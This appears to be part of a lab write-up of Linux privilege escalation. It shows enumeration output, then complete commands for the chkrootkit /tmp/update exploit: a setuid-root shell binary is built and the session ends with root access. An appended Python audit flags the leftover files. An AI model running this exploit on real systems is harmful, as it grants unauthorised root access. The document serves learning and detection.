-rwxr-xr-x 1 root root 531776 Jan 13 2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader
/etc/init.d/ binary permissions:
total 144
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 0 Mar 30 2016 .legacy-bootordering
-rw-r--r-- 1 root root 2427 Jul 26 2012 README
-rwxr-xr-x 1 root root 4596 Sep 25 2012 apparmor
lrwxrwxrwx 1 root root 21 Oct 25 2011 atd -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2444 Jul 26 2012 bootlogd
lrwxrwxrwx 1 root root 21 Apr 19 2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 19 2012 cron -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 13 2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Nov 26 2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean
lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1105 Dec 15 2015 grub-common
-rwxr-xr-x 1 root root 1329 Jul 26 2012 halt
lrwxrwxrwx 1 root root 21 May 26 2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Feb 3 2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1293 Jul 26 2012 killprocs
-rwxr-xr-x 1 root root 2545 Aug 19 2010 lighttpd
lrwxrwxrwx 1 root root 21 Nov 20 2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2797 Feb 13 2012 networking
-rwxr-xr-x 1 root root 882 Jul 26 2012 ondemand
lrwxrwxrwx 1 root root 21 Sep 12 2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns
lrwxrwxrwx 1 root root 21 Oct 28 2013 procps -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 8635 Jul 26 2012 rc
-rwxr-xr-x 1 root root 801 Jul 26 2012 rc.local
-rwxr-xr-x 1 root root 117 Jul 26 2012 rcS
-rwxr-xr-x 1 root root 639 Jul 26 2012 reboot
lrwxrwxrwx 1 root root 21 Sep 8 2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync
lrwxrwxrwx 1 root root 21 Nov 26 2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4321 Jul 26 2012 sendsigs
lrwxrwxrwx 1 root root 21 Apr 19 2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 590 Jul 26 2012 single
-rw-r--r-- 1 root root 4304 Jul 26 2012 skeleton
-rwxr-xr-x 1 root root 4371 Jan 13 2016 ssh
-rwxr-xr-x 1 root root 567 Jul 26 2012 stop-bootlogd
-rwxr-xr-x 1 root root 1143 Jul 26 2012 stop-bootlogd-single
-rwxr-xr-x 1 root root 700 May 23 2012 sudo
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Apr 5 2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2800 Jul 26 2012 umountfs
-rwxr-xr-x 1 root root 2211 Jul 26 2012 umountnfs.sh
-rwxr-xr-x 1 root root 2926 Jul 26 2012 umountroot
-rwxr-xr-x 1 root root 1985 Jul 26 2012 urandom
### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1
### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
Installed compilers:
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler
Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12 2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30 2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30 2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25 2016 /etc/shadow
Can't search *.conf files as no keyword was entered
Can't search *.log files as no keyword was entered
Can't search *.ini files as no keyword was entered
All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30 2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30 2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30 2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19 2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16 2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep 5 2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May 2 2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12 2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30 2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30 2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30 2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf
Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 30 2016 .
drwxr-xr-x 12 root root 4096 Apr 26 2016 ..
### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$
dpkg -l | grep chkrootkit
rc chkrootkit 0.49-4ubuntu1.1 rootkit detector
echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c
echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update
gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]
www-data@ubuntu:/tmp$ run-parts
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
-rwxr-xr-x 1 www-data www-data 40155 Jan 5 09:42 1.sh
-rw-r--r-- 1 www-data www-data 40155 Jan 5 09:43 2.py
-rw-r--r-- 1 www-data www-data 36801 Jan 5 09:43 3.sh
-rw-r--r-- 1 www-data www-data 5123 Jan 5 09:48 37292.c
drwxrwxrwt 2 root root 4096 Jan 5 09:41 VMwareDnD
srwxr-xr-x 1 www-data www-data 0 Jan 5 09:41 php.socket-0
-rwsrwxrwx 1 root root 7235 Jan 5 09:59 test
-rw-rw-rw- 1 www-data www-data 69 Jan 5 09:56 test.c
-rw-rw-rw- 1 www-data www-data 2 Jan 5 09:55 test.cls
-rwxrwxrwx 1 www-data www-data 74 Jan 5 09:57 update
-rw-rw-rw- 1 www-data www-data 20 Jan 5 09:56 updatels
-rw-r--r-- 1 root root 1600 Jan 5 09:41 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 5 09:41 vmware-root
www-data@ubuntu:/tmp$ ./test
./test
whoami
root
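A small audit of a /tmp listing, added here as an example and not part of the writeup, that parses `ls -la` lines like the ones above and flags what the escalation leaves behind: a setuid-root file in a world-writable directory, a world-writable executable, and a file named `update` (older chkrootkit releases execute /tmp/update as root from the daily cron run, which is the path used above). The sample listing copies entries from the writeup and adds two constructed ones (helper.sh and a setuid file owned by john) to exercise every branch.

```python
import re

# Long-listing line as printed by `ls -la` (type, mode, links, owner, group,
# size, month, day, year-or-time, name).
LS_RE = re.compile(
    r'^(?P<type>[-dlspcb])(?P<perms>[rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)'
    r'\s+\d+\s+\S+\s+\d+\s+(?:\d{4}|\d{2}:\d{2})\s+(?P<name>.+)$'
)

# Entries copied from the writeup's /tmp listing plus two constructed ones.
SAMPLE_LS = """\
drwxrwxrwt  2 root     root     4096 Jan  5 09:41 .
drwxr-xr-x 22 root     root     4096 Mar 30  2016 ..
-rwxr-xr-x  1 www-data www-data 40155 Jan  5 09:42 1.sh
-rw-r--r--  1 www-data www-data  5123 Jan  5 09:48 37292.c
-rwxrwxrwx  1 www-data www-data   120 Jan  5 09:50 helper.sh
-rwsr-xr-x  1 john     john     7235 Jan  5 09:52 keep
srwxr-xr-x  1 www-data www-data     0 Jan  5 09:41 php.socket-0
-rwsrwxrwx  1 root     root     7235 Jan  5 09:59 test
-rw-rw-rw-  1 www-data www-data    69 Jan  5 09:56 test.c
-rwxrwxrwx  1 www-data www-data    74 Jan  5 09:57 update
-rw-r--r--  1 root     root     1600 Jan  5 09:41 vgauthsvclog.txt.0
"""


def audit_tmp_listing(listing: str, directory: str = "/tmp") -> list:
    """Return (path, severity, reason) tuples for suspicious regular files."""
    findings = []
    for line in listing.splitlines():
        m = LS_RE.match(line)
        if not m or m["name"] in (".", ".."):
            continue
        ftype, p, owner, name = m["type"], m["perms"], m["owner"], m["name"]
        if ftype != "-":
            continue  # directories, sockets and links are out of scope here
        setuid = p[2] in "sS"
        setgid = p[5] in "sS"
        world_writable = p[7] == "w"
        other_exec = p[8] in "xt"
        path = f"{directory}/{name}"
        if setuid and owner == "root":
            findings.append((path, "critical", "setuid-root file in world-writable directory"))
        elif setuid or setgid:
            findings.append((path, "high", "setuid/setgid file in world-writable directory"))
        elif name == "update":
            findings.append((path, "high", "/tmp/update present: run as root by old chkrootkit cron jobs"))
        elif world_writable and other_exec:
            findings.append((path, "medium", "world-writable executable"))
    return findings


if __name__ == "__main__":
    for path, severity, reason in audit_tmp_listing(SAMPLE_LS):
        print(f"{severity:8} {path}: {reason}")
```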
Regards,
Yuriy Stanchev/URIX